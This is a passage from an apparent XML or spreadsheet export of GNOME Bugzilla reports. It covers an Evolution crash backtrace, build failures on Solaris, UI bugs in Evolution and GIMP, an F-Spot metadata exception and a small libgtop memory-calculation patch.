#15 0x401e7e3b in e_sexp_eval (f=0x9580388) at e-sexp.c:1304
No locals.
#16 0x416e6598 in camel_filter_search_match (session=0x8139628 
    get_message=0x416e4ae6  data=0xbe9ff9ac
info=0x940f3c4 
    source=0x942be58 imap://mmeeks@wal-3.novell.com/INBOX 
    expression=0x943ff00  (and\n  (match-all (header-matches
\x-camel-mlist\  \cvs-commits-list\))\n  )\n ex=0x9580054) at
camel-filter-search.c:684
	fms = {session = 0x8139628 get_message = 0x416e4ae6 
  get_message_data = 0xbe9ff9ac message = 0x0 info = 0x940f3c4 
  source = 0x942be58 imap://mmeeks@wal-3.novell.com/INBOX ex =
0x9580054}
	sexp = (ESExp *) 0x9580388
	result = (ESExpResult *) 0x93fe5c8
	retval = 0
	i = 21
#17 0x416e4db7 in camel_filter_driver_filter_message (driver=0x9580510
    message=0x0 info=0x940f3c4 uid=0x943fb68 5872 source=0x93ebe18
    source_url=0x942be58 imap://mmeeks@wal-3.novell.com/INBOX 
    original_source_url=0x942be58
imap://mmeeks@wal-3.novell.com/INBOX 
    ex=0x9580054) at camel-filter-driver.c:1422
	data = {p = 0x9433498 
  source_url = 0x942be58 imap://mmeeks@wal-3.novell.com/INBOX}
	p = (struct _CamelFilterDriverPrivate *) 0x9433498
	node = (struct _filter_rule *) 0x943fd30
	freeinfo = 0
	filtered = 0
	r = (ESExpResult *) 0x416f2081
	result = 0
#18 0x416f3bde in filter_filter (session=0x8139628 msg=0x9580018)
    at camel-folder.c:1664
	uid = 0x944af88 5872
	pc = 0
	m = (struct _folder_filter_msg *) 0x9580018
	info = (CamelMessageInfo *) 0x940f3c4
	i = 0
	status = 0
	uri = (CamelURL *) 0x942d730
	source_url = 0x942be58 imap://mmeeks@wal-3.novell.com/INBOX
	ex = {id = -1096811552 desc = 0x0}
	csp = (CamelJunkPlugin *) 0x41b67360
#19 0x41704981 in session_thread_received (thread=0x942b1d8
msg=0x9580018 
    session=0x8139628) at camel-session.c:522
	oldop = (CamelOperation *) 0x0
#20 0x401e4cfc in thread_received_msg (e=0x942b1d8 m=0x9580018)
    at e-msgport.c:826
	func = 0x4170493c 
	func_data = (void *) 0x8139628
#21 0x401e4efb in thread_dispatch (din=0x942b1d8) at e-msgport.c:907
	e = (EThread *) 0x942b1d8
	m = (EMsg *) 0x9580018
	info = (struct _thread_info *) 0x0
	self = 147465
#22 0x4100f201 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#23 0x412ff53a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 9 (Thread 114696 (LWP 23624)):
#0  0x412f629a in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x411ec558 in g_main_context_iterate ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#2  0x411ed7b7 in g_main_loop_run () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x40a42780 in link_io_thread_fn () from
/opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#4  0x412062a9 in g_thread_create_proxy () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x4100f201 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#6  0x412ff53a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 8 (Thread 98311 (LWP 23623)):
#0  0x410120c4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41010f38 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4100e80c in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x401e451e in e_msgport_wait (mp=0x81b61f8) at e-msgport.c:511
	_buffer = {__routine = 0x401e4286  
  __arg = 0x81b61f8 __canceltype = 156143400 __prev = 0x0}
	msg = (EMsg *) 0x0
#4  0x401e4e36 in thread_dispatch (din=0x81bdcd8) at e-msgport.c:874
	e = (EThread *) 0x81bdcd8
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 98311
#5  0x4100f201 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#6  0x412ff53a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 7 (Thread 81926 (LWP 23599)):
#0  0x410120c4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41010f38 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4100e80c in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x401e451e in e_msgport_wait (mp=0x81bcbe0) at e-msgport.c:511
	_buffer = {__routine = 0x401e4286  
  __arg = 0x81bcbe0 __canceltype = 154786400 __prev = 0x0}
	msg = (EMsg *) 0x89424b8
#4  0x401e4e36 in thread_dispatch (din=0x81bdef0) at e-msgport.c:874
	e = (EThread *) 0x81bdef0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x89424b8
	self = 81926
#5  0x4100f201 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#6  0x412ff53a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 6 (Thread 65541 (LWP 23598)):
#0  0x410120c4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41010f38 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4100e80c in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x401e451e in e_msgport_wait (mp=0x81bcbe0) at e-msgport.c:511
	_buffer = {__routine = 0x401e4286  
  __arg = 0x81bcbe0 __canceltype = 154746464 __prev = 0x0}
	msg = (EMsg *) 0x8943bb0
#4  0x401e4e36 in thread_dispatch (din=0x81bdef0) at e-msgport.c:874
	e = (EThread *) 0x81bdef0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x8943bb0
	self = 65541
#5  0x4100f201 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#6  0x412ff53a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 5 (Thread 49156 (LWP 23568)):
#0  0x410120c4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41010f38 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4100e80c in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x401e451e in e_msgport_wait (mp=0x81bde88) at e-msgport.c:511
	_buffer = {__routine = 0x401e4286  
  __arg = 0x81bde88 __canceltype = 155212184 __prev = 0x0}
	msg = (EMsg *) 0x0
#4  0x401e4e36 in thread_dispatch (din=0x81b6260) at e-msgport.c:874
	e = (EThread *) 0x81b6260
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 49156
#5  0x4100f201 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#6  0x412ff53a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 4 (Thread 32771 (LWP 23567)):
#0  0x410120c4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41010f38 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4100e80c in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x401e451e in e_msgport_wait (mp=0x81bcbe0) at e-msgport.c:511
	_buffer = {__routine = 0x401e4286  
  __arg = 0x81bcbe0 __canceltype = 148157480 __prev = 0x0}
	msg = (EMsg *) 0x872a8c8
#4  0x401e4e36 in thread_dispatch (din=0x81bdef0) at e-msgport.c:874
	e = (EThread *) 0x81bdef0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x872a8c8
	self = 32771
#5  0x4100f201 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#6  0x412ff53a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 3 (Thread 16386 (LWP 23566)):
#0  0x410120c4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41010f38 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4100e80c in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x401e451e in e_msgport_wait (mp=0x81bcbe0) at e-msgport.c:511
	_buffer = {__routine = 0x401e4286  
  __arg = 0x81bcbe0 __canceltype = 155601056 __prev = 0x0}
	msg = (EMsg *) 0x8201980
#4  0x401e4e36 in thread_dispatch (din=0x81bdef0) at e-msgport.c:874
	e = (EThread *) 0x81bdef0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x8201980
	self = 16386
#5  0x4100f201 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#6  0x412ff53a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 2 (Thread 32769 (LWP 23565)):
#0  0x412f629a in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x4100f5f0 in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
#2  0x412ff53a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 1 (Thread 16384 (LWP 23552)):
#0  0x410171bb in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#1  0x404fe0dc in __JCR_LIST__ () from /opt/gnome/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x00000001 in ?? ()
No symbol table info available.
#3  0x404c3f3a in libgnomeui_segv_handle ()
   from /opt/gnome/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x0806581d in segv_redirect (sig=11) at main.c:431
No locals.
#5  0x41015e51 in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#6  
No symbol table info available.
#7  0x412f629a in poll () from /lib/libc.so.6
No symbol table info available.
#8  0x411ec558 in g_main_context_iterate ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x411ed7b7 in g_main_loop_run () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x408824d0 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
No symbol table info available.
#11 0x08065e50 in main (argc=1 argv=0xbfffeff4) at main.c:613
	options = {{longName = 0x806cbf9 component shortName = 99 'c' 
    argInfo = 1 arg = 0x806fb40 val = 0 
    descrip = 0x806cc04 Start Evolution activating the specified
component 
    argDescrip = 0x0} {longName = 0x806cc37 offline shortName = 0
'\0' 
    argInfo = 0 arg = 0x806fb2c val = 0 
    descrip = 0x806cc3f Start in offline mode argDescrip = 0x0} {
    longName = 0x806cc55 online shortName = 0 '\0' argInfo = 0 
    arg = 0x806fb28 val = 0 descrip = 0x806cc5c Start in online
mode 
    argDescrip = 0x0} {longName = 0x806cc71 force-shutdown 
    shortName = 0 '\0' argInfo = 0 arg = 0x806fb34 val = 0 
    descrip = 0x806cc80 Forcibly shut down all Evolution components 
    argDescrip = 0x0} {longName = 0x806ccac force-migrate 
    shortName = 0 '\0' argInfo = 0 arg = 0x806fb38 val = 0 
    descrip = 0x806ccbc Forcibly re-migrate from Evolution 1.4 
    argDescrip = 0x0} {longName = 0x806cce3 debug shortName = 0
'\0' 
    argInfo = 1 arg = 0x806fb44 val = 0 
    descrip = 0x806ccec Send the debugging output of all components to
a file. argDescrip = 0x0} {longName = 0x806cd23 disable-eplugin 
    shortName = 0 '\0' argInfo = 0 arg = 0x806fb3c val = 0 
    descrip = 0x806cd34 Disable loading of any plugins. argDescrip =
0x0} {
    longName = 0x806cd54 setup-only shortName = 0 '\0' 
    argInfo = 1073741824 arg = 0x806fb30 val = 0 descrip = 0x0 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 0
    arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
	client = (GConfClient *) 0x80a36c8
	skip_warning_dialog = 1
	uri_list = (GSList *) 0x0
	popt_context_value = {g_type = 0 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	program = (GnomeProgram *) 0x8077010
	popt_context = 0x8079750
	args = (const char **) 0x0
	evolution_directory = 0x811bb78 org.gnome.evolution.shell.events
	icon_list = (GList *) 0x80fb48c
#0  0x410171bb in waitpid () from /lib/libpthread.so.0
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-342254</t>
  </si>
  <si>
    <t>[optimization] Remove redunant iteration in apppend_matches</t>
  </si>
  <si>
    <t>While working on the cuemiac refactoring I discovered a redundant iteration of the match list unpacking and repacking the (qstring match) pairs.
This appears both in button mode and entriac mode. Patch attached in next post.
PS: Is there any way to attach a patch to the initial post in bugzilla?</t>
  </si>
  <si>
    <t>GTK+-50231</t>
  </si>
  <si>
    <t>Text widget using G_TYPE_POINTER where it should use a boxed type</t>
  </si>
  <si>
    <t>This bug is blocking on a solution to the problem of fixing boxed types not
to be copied on signal emission</t>
  </si>
  <si>
    <t>GNUMERIC-135977</t>
  </si>
  <si>
    <t>xls importer: bad color of text in a label</t>
  </si>
  <si>
    <t>In the .xls file I will attach there is a label that appears white in
gnumeric and black in XL.</t>
  </si>
  <si>
    <t>GNOME-PANEL-352239</t>
  </si>
  <si>
    <t>gnome-panel failing to build because of libXau unresolved symbols</t>
  </si>
  <si>
    <t>Please describe the problem:
When compiling gnome-panel on Solaris it is failing because of libXau unresolved symbols. It was not failing before on Solaris symbols for libXau were included in
libX11 but have now been removed.
panel-gdm.c explicitly calls libXau API : 
   XauFileName()
   XauReadAuth()
   XauDisposeAuth()
And really should include -lXau on linker line
Steps to reproduce:
1. Try to build gnome-panel on Solaris Express.
Fails for panel-gdm.o during linking of gnome-panel for symbols :
   XauFileName()
   XauReadAuth()
   XauDisposeAuth()
Actual results:
Expected results:
Does this happen every time?
Yes
Other information:
Solution is simply to amend gnome-panel/gnome-panel/Makefile.am
and include -lXau on linker line.</t>
  </si>
  <si>
    <t>EVOLUTION-236836</t>
  </si>
  <si>
    <t>Calendar no longer displays category icons</t>
  </si>
  <si>
    <t>Recurrence and alarm icons are shown in the day/week/month views but not
the category icons (birthday important competition etc). They used to
appear I don't know when they went away.</t>
  </si>
  <si>
    <t>GNOME-SESSION-83626</t>
  </si>
  <si>
    <t>bindtextdomain with wrong domain names</t>
  </si>
  <si>
    <t>With Solaris native gettext bindtextdomain is called with 
wrong text domain. While .po are installed at 
$(prefix)/lib/locale bindtextdomain() is called with
$(prefix)/share/locale and no tranlation.
gnome-session/Makefile.am:     
-DGNOMELOCALEDIR=\$(datadir)/locale\       \
smproxy/Makefile.am:    -DGNOMELOCALEDIR=\$(datadir)/locale\
All of the above should use ${prefix}/${DATADIRNAME}/locale.</t>
  </si>
  <si>
    <t>LSR-388676</t>
  </si>
  <si>
    <t>Reinstate/fix CMD_CODE accept/ignore logic</t>
  </si>
  <si>
    <t>The brlapi has changed it's KEY_CMD codes which breaks the ignore/accept scheme.</t>
  </si>
  <si>
    <t>XCHAT-GNOME-336181</t>
  </si>
  <si>
    <t>clicking irc:// link when x-g isn't running doesn't connect the server</t>
  </si>
  <si>
    <t>When there is no x-g window running and I click on a URL irc:// x-g starts but don't connect the server. The problem seems to be that xchat-gnome-remote sees that there is no x-g running so it starts a new one with command line Â«xchat-gnome -a --url=irc:///Â» (manually lunch this command doesn't connect the URL). I think the problem is that with -a option he doesn't connect any servers so don't connect the server passed with --url. When I coded the dbus plugin is worked well and it still works well with xchat (tested current CVS).
Can someone confirm this bug is still present on xchat-gnome HEAD ?</t>
  </si>
  <si>
    <t>EVOLUTION-208506</t>
  </si>
  <si>
    <t>The IMAP password dialog can freeze the desktop</t>
  </si>
  <si>
    <t>When the Folder Bar is in Drop down mode one can get Evolution to grab
the system focus and never let go.  Follow these steps to reproduce:
o Configure an working IMAP server in Evolution.
o Select the local Inbox folder so as to have it be the default folder upon
restart
o Restart evolution so there is no connection to the IMAP server.  This
should leave you in the local Inbox folder.
o Make sure that View-&gt;Folder Bar is unset (the Folder Bar is not visible).
o Click on the arrow next to the current folder name.  This should make the
Folder Bar visible.
o Select your IMAP server.  The IMAP password dialog box will pop up. 
Notice however that you cannot type to it.  In fact you cannot click or
type anywhere.  Here is the bug.
If the Folder Bar is always visible (View-&gt;Folder Bar is set) this does
not happen.  The password dialog accepts your input and continues on its
merry way.  I have a suspicion it has to do with focus code as evolution
tries to simultaneously put up the modal password dialog and hide the
Folder Bar.
My window manager is sawfish 1.0 Linux 2.4.7-ac11 libc 2.2.3.</t>
  </si>
  <si>
    <t>jlbec</t>
  </si>
  <si>
    <t>JHBUILD-386193</t>
  </si>
  <si>
    <t>should be able to check for GNUmakefile</t>
  </si>
  <si>
    <t>Please describe the problem:
AbiWord is using GNU prefixed makefiles for historical reasons. It would be nice if jbhuild supported looking for GNUmakefile in addition to Makefile in the toplevel project directory when pondering whether to autogen or just make.
An additional optional parameter in the .modules file would seem reasonable maybe something like 
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GSTREAMER-307160</t>
  </si>
  <si>
    <t>[gst1394] gives an error when gst-register'ing</t>
  </si>
  <si>
    <t>When i gst-register with the current CVS i get this message:
Added plugin gst1394 with 1 feature.
(process:31635): GStreamer-CRITICAL **: gst_tag_register: assertion `info ==
NULL' failed
The other plugins are registered fine.</t>
  </si>
  <si>
    <t>EVOLUTION-256749</t>
  </si>
  <si>
    <t>UI Inconsitency/Deficiency with Copy in mail preview/view</t>
  </si>
  <si>
    <t>Description of Problem:
In the preview pane or when viewing an email in a new window there is
no context menu on right click on a selection specifically no context
menu option to copy selected text.
There is also an inconsitency in the edit menu between the preview pan
and viwing email in a separate window. 
In the preview pan the edit menu has Copy but when viwing in a
separate window the edit menu does not have Copy
Steps to reproduce the problem:
1. View email in preview pane 
2. Select some text to copy
3. Right Click for context menu (Fails)
4. Edit Menu Copy (Works)
5. Open message in new window
6. Repeat steps 2-4 this time 4 does not have copy option.
Actual Results:
Expected Results:
How often does this happen? 
Additional Information:</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-74198</t>
  </si>
  <si>
    <t>GnomeTerminal fails to compile on Solaris</t>
  </si>
  <si>
    <t>GnomeTerminal fails to compile on Solaris (using forte compiler).
Following error can be seen  during compilation :
ild: (undefined symbol) XSendEvent -- referenced in the text segment of
terminal-window.o
ild: (undefined symbol) XListFonts -- referenced in the text segment of
x-font-selector.o
ild: (undefined symbol) XLookupString -- referenced in the text segment of
eggcellrendererkeys.o
ild: (undefined symbol) XGetModifierMapping -- referenced in the text
segment of eggcellrendererkeys.o
ild: (undefined symbol) XFreeFontNames -- referenced in the text segment of
x-font-selector.o
ild: (undefined symbol) XGetFontProperty -- referenced in the text segment
of x-font-selector.o
ild: (undefined symbol) XFreeModifiermap -- referenced in the text segment
of eggcellrendererkeys.o
ild: (undefined symbol) XFontsOfFontSet -- referenced in the text segment
of x-font-selector.o
make[1]: *** [gnome-terminal] Error 5</t>
  </si>
  <si>
    <t>F-SPOT-342663</t>
  </si>
  <si>
    <t>Viewing MetaData causes Value not found in ColorSpace</t>
  </si>
  <si>
    <t>Step to reproduce this fault
1) Import the Angelina Jolie picture
2) View Metadata of Angelina Jolie
3) Check printouts on console. (attached below)
open uri = file:///home/bengt/Photos/2005/3/9/Angelina_Jolie_39200590049PM726.jpg
read = 16399
read 1061 -
read ResolutionInfo -
read 1062 -
read GlobalAngle -
read GlobalAltitude -
read PrintFlags -
read CopyrightFlag -
read PrintFlags2 -
read ColorHalftone -
read ColorTransfer -
read GridGuideInformation -
read URLList -
read Slices -
read 1064 -
read ICCUntagged -
read LastID -
read ThumbnailResource2 -
read VersionInfo -
read JpegQuality -
Value 4294967295 not found in FSpot.Tiff.ColorSpace
System.ArgumentException: The requested value `4294967295' was not found ---&gt; System.OverflowException: Value too large or too small.
in  System.UInt16:Parse (System.String s NumberStyles style IFormatProvider provider)
in  System.UInt16:Parse (System.String s IFormatProvider provider)
in  System.Convert:ToUInt16 (System.String value IFormatProvider provider)
in  System.String:System.IConvertible.ToUInt16 (IFormatProvider provider)
in  System.Convert:ToType (System.Object value System.Type conversionType IFormatProvider provider)
in  System.Convert:ChangeType (System.Object value TypeCode typeCode)
in  System.Enum:Parse (System.Type enumType System.String value Boolean ignoreCase)--- End of inner exception stack trace ---
in  System.Enum:Parse (System.Type enumType System.String value Boolean ignoreCase)
in  System.Enum:Parse (System.Type enumType System.String value)
in  FSpot.ValueFormat:GetValue (SemWeb.MemoryStore store SemWeb.Literal obj)
open uri = file:///home/bengt/Photos/2005/3/9/Angelina_Jolie_39200590049PM726.jpg
read = 16399
read 1061 -
read ResolutionInfo -
read 1062 -
read GlobalAngle -
read GlobalAltitude -
read PrintFlags -
read CopyrightFlag -
read PrintFlags2 -
read ColorHalftone -
read ColorTransfer -
read GridGuideInformation -
read URLList -
read Slices -
read 1064 -
read ICCUntagged -
read LastID -
read ThumbnailResource2 -
read VersionInfo -
read JpegQuality -
Value 4294967295 not found in FSpot.Tiff.ColorSpace
System.ArgumentException: The requested value `4294967295' was not found ---&gt; System.OverflowException: Value too large or too small.
in  System.UInt16:Parse (System.String s NumberStyles style IFormatProvider provider)
in  System.UInt16:Parse (System.String s IFormatProvider provider)
in  System.Convert:ToUInt16 (System.String value IFormatProvider provider)
in  System.String:System.IConvertible.ToUInt16 (IFormatProvider provider)
in  System.Convert:ToType (System.Object value System.Type conversionType IFormatProvider provider)
in  System.Convert:ChangeType (System.Object value TypeCode typeCode)
in  System.Enum:Parse (System.Type enumType System.String value Boolean ignoreCase)--- End of inner exception stack trace ---
in  System.Enum:Parse (System.Type enumType System.String value Boolean ignoreCase)
in  System.Enum:Parse (System.Type enumType System.String value)
in  FSpot.ValueFormat:GetValue (SemWeb.MemoryStore store SemWeb.Literal obj)</t>
  </si>
  <si>
    <t>VALA-704612</t>
  </si>
  <si>
    <t>libarchive.vapi : fix read_data_block() function binding</t>
  </si>
  <si>
    <t>Created attachment 249700
libarchive-read_data_block.patch
read_data_block() is incorrectly named read_block () in VAPI.
See attached patch.</t>
  </si>
  <si>
    <t>tarnyko</t>
  </si>
  <si>
    <t>ADWAITA-ICON-THEME-408225</t>
  </si>
  <si>
    <t>Remove evolution icon</t>
  </si>
  <si>
    <t>The evoluton icon is now installed by evolution module (see # 350253)
The same icon provided by gnome-icon-theme should be removed.</t>
  </si>
  <si>
    <t>GNOME-UTILS-341846</t>
  </si>
  <si>
    <t>cannot find -lXext</t>
  </si>
  <si>
    <t>Please describe the problem:
compiling gnome-utils 2.14.0 compiling fails on the screenshot utility that
fails to find -lXext due to an alternative locations of the xlibs...
even --x-libraries=/usr/X11R7/lib doesn't seem to help
ldconfig -p | grep Xext does find the library without a glitch
Steps to reproduce:
1. install X in alternative location (f.e. X11r7 in /usr/X11R7 instead of
/usr/X11R6)
2. try installing gnome-utils
3. 
Actual results:
gcc -O2 -march=i686 -s -o gnome-screenshot gnome-panel-screenshot.o
screenshot-dialog.o screenshot-shadow.o screenshot-utils.o
gnome-egg-xfer-dialog.o screenshot-save.o screenshot-xfer.o -pthread
-Wl--export-dynamic  -lXext /usr/lib/libgnomeui-2.so /usr/lib/libbonoboui-2.so
/usr/lib/libgnome-keyring.so /usr/lib/libgnomecanvas-2.so /usr/lib/libgnome-2.so
/usr/lib/libart_lgpl_2.so /usr/lib/libpangoft2-1.0.so /usr/lib/libgnomevfs-2.so
/usr/lib/libbonobo-2.so /usr/lib/libgconf-2.so /usr/lib/libbonobo-activation.so
/usr/lib/libORBit-2.so /usr/lib/libgthread-2.0.so /usr/lib/libglade-2.0.so
/usr/lib/libgtk-x11-2.0.so /usr/lib/libxml2.so -lz /usr/lib/libgdk-x11-2.0.so
/usr/lib/libatk-1.0.so /usr/lib/libgdk_pixbuf-2.0.so -lm
/usr/lib/libpangocairo-1.0.so /usr/lib/libpango-1.0.so /usr/lib/libcairo.so
/usr/lib/libgobject-2.0.so /usr/lib/libgmodule-2.0.so -ldl
/usr/lib/libglib-2.0.so /usr/lib/libpopt.so
/usr/bin/ld: cannot find -lXext
collect2: ld returned 1 exit status
though :
ldconfig -p | grep Xext 
libXext.so.6 (libc6) =&gt; /usr/X11R7/lib/libXext.so.6
libXext.so (libc6) =&gt; /usr/X11R7/lib/libXext.so
Expected results:
compile correclt and find the Xext lib as every other tarball
Does this happen every time?
yes
Other information:
yes</t>
  </si>
  <si>
    <t>samverstraete</t>
  </si>
  <si>
    <t>LIBGTOP-79047</t>
  </si>
  <si>
    <t>CVS - libgtop/sysdep.h - uses u_int64_t - which doesnt exist</t>
  </si>
  <si>
    <t>Okay - so maybe OSF/1 is not supposed to be supported here ... but libgtop
compiled and installed without complaint ... however gnome-system-monitor
failed to compile due to the definition above - which is not defined on
OSF/1 4.0
also occurs in mountlist fsusage cpu mem swap ... etc etc - just about all
the headers.
int64_t also turns up... - a simple define if __osf__ in glibtop.h - might
do the job... (i changed lots of them to long and unsigned long - manualy
myself - only realised that might of worked after i started.)</t>
  </si>
  <si>
    <t>GIMP-152193</t>
  </si>
  <si>
    <t>crash when deleting paths dialog</t>
  </si>
  <si>
    <t>This is a bit complicated but I can reliably get a crash if I do the following
things *exactly*:
1) Create a Layers Channels and Paths dock.
2) Drag the Paths dialog out of the dock and drop it in space to create a new
Paths dialog.
3) Drag the new Paths dialog onto the bottom docking bar of the Layers
Channels Paths dock (which no longer contains Paths).
4) Drag the Paths dialog *out of* the dock it was just added to and drop it in
space.
5) In the Tab menu for the (Path-less) Layers Channels Paths dock choose Add
Tab and add a Paths dialog.
6) Close the other Paths dialog -- the one outside the Layers Channels Paths
dock.  Crash!
Here are the error messages and a gdb stack trace:
(gimp-2.1:28965): GLib-GObject-WARNING **: invalid uninstantiatable type
`' in cast to `GimpContainerTreeView'
(gimp-2.1:28965): GLib-GObject-WARNING **: invalid uninstantiatable type
`(null)' in cast to `GtkTreeView'
(gimp-2.1:28965): Gtk-CRITICAL **: file gtktreeview.c: line 8917
(gtk_tree_view_get_vadjustment): assertion `GTK_IS_TREE_VIEW (tree_view)' failed
Program received signal SIGSEGV Segmentation fault.
0x0811f3e2 in gimp_container_tree_view_scroll_timeout (data=0x8a57260)
    at gimpcontainertreeview-dnd.c:182
182         new_value = adj-&gt;value - SCROLL_STEP
(gdb) where
#0  0x0811f3e2 in gimp_container_tree_view_scroll_timeout (data=0x8a57260)
    at gimpcontainertreeview-dnd.c:182
#1  0x002da8a3 in g_timeout_dispatch (source=0x8e240f0 callback=0
user_data=0x8a57260)
    at gmain.c:3301
#2  0x002d81e8 in g_main_dispatch (context=0x8396fe8) at gmain.c:1942
#3  0x002d91f9 in g_main_context_dispatch (context=0x8396fe8) at gmain.c:2492
#4  0x002d951e in g_main_context_iterate (context=0x8396fe8 block=1 dispatch=1
    self=0x83ac080) at gmain.c:2573
#5  0x002d9a86 in g_main_loop_run (loop=0x8b89dc8) at gmain.c:2777
#6  0x0808aa6a in app_run (full_prog_name=0xfefb99d5 /data/usr/local/bin/gimp-2.1
    gimp_argc=0 gimp_argv=0xfef6b528 alternate_system_gimprc=0x0
alternate_gimprc=0x0
    session_name=0x0 batch_cmds=0x83ac128 no_interface=0 no_data=0 no_fonts=0
    no_splash=0 be_verbose=0 use_shm=1 use_cpu_accel=1 console_messages=0
    stack_trace_mode=GIMP_STACK_TRACE_QUERY pdb_compat_mode=GIMP_PDB_COMPAT_WARN)
    at app_procs.c:372
#7  0x0808af38 in main (argc=1 argv=0xfef6b524) at main.c:458
I am running FC2/Gtk2.4.4.  The build is CVS head about 5 days old.</t>
  </si>
  <si>
    <t>SEAHORSE-341987</t>
  </si>
  <si>
    <t>libcryptui</t>
  </si>
  <si>
    <t>Bring libcryptui recipients dialog up to snuff</t>
  </si>
  <si>
    <t>The libcryptui recipients dialog needs some work to come up to the level of our old dialog. This includes repsonding to key strokes appropriately. The signer dialog also needs some help.</t>
  </si>
  <si>
    <t>EVOLUTION-201236</t>
  </si>
  <si>
    <t>assign color and other tags</t>
  </si>
  <si>
    <t>you should be able to edit message colors without using filter rules</t>
  </si>
  <si>
    <t>GTK+-59803</t>
  </si>
  <si>
    <t>GtkEditable needs signals</t>
  </si>
  <si>
    <t>When the new GtkEditable interface first appeared you couldn't have
signals on interfaces.  This has since changed.  However the editable
signals (insert_text delete_text changed et al.) are still on the
objects instead of the interface.  This should be changed at some point.</t>
  </si>
  <si>
    <t>LIBGTOP-68626</t>
  </si>
  <si>
    <t>fix for wrong calculation of used memory in libgtop</t>
  </si>
  <si>
    <t xml:space="preserve">Package: libgtop
Severity: normal
Version: 1.0.13
Synopsis: fix for wrong calculation of used memory in libgtop
Bugzilla-Product: libgtop
Bugzilla-Component: general
Description:
here is a patch to correct a bug for memory calculation in libgtop:
diff -uNr libgtop-1.0.12.orig/sysdeps/linux/mem.c
libgtop-1.0.12/sysdeps/linux/mem.c
--- libgtop-1.0.12.orig/sysdeps/linux/mem.c     Thu May 27 21:24:14
1999
+++ libgtop-1.0.12/sysdeps/linux/mem.c  Sun Aug 19 15:58:05 2001
@@ -757 +757 @@
        buf-&gt;buffer = strtoul (p 
        buf-&gt;cached = strtoul (p 
-       buf-&gt;user = buf-&gt;total - buf-&gt;free - buf-&gt;shared - buf-&gt;buffer
+       buf-&gt;user = buf-&gt;total - buf-&gt;free - buf-&gt;cached - buf-&gt;buffer
        buf-&gt;flags = _glibtop_sysdeps_mem
 }
I hope it's correct. :-)
